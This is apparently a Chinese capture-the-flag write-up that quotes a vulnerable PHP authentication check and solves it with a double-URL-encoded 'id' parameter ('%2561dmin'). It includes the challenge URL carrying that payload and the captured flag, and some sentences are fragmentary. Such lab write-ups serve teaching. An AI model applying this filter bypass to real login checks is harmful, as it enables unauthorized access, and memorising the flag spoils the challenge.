就一行字
Can you anthenticate to this website?
index.phps
知识点:
phps 是php标准中用来表示可以查看的php源文件的约定,不会被服务器执行
直接展示代码
<?php
if("admin"===$_GET[id]) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
echo "<p>Access granted!</p>";
echo "<p>Key: xxxxxxx </p>";
}
?>
Can you anthenticate to this website?
admin
,同时urldecode以后又必须是admin
才有戏知识点:
我们可以对参数进行urlencode的操作,urlencode会对所有非ascii码所表示的字符进行编码,编码成ascii码字符串组合来代替
其中 a 对应的就是 %61
参考: https://www.w3school.com.cn/tags/html_ref_urlencode.asp
%61dmin
经过 urldecode以后 就会变为 admin
, 从而通过检查%61dmin
,进入代码块时就已经被解析为admin
而导致显示 not allowed了%61
再做一次urlendcode 得到%2561
http://61.147.171.105:63925/index.php?id=%2561dmin
boom 得到flag: cyberpeace{d30a3860b94b12cc3d96717cbbb6fabb}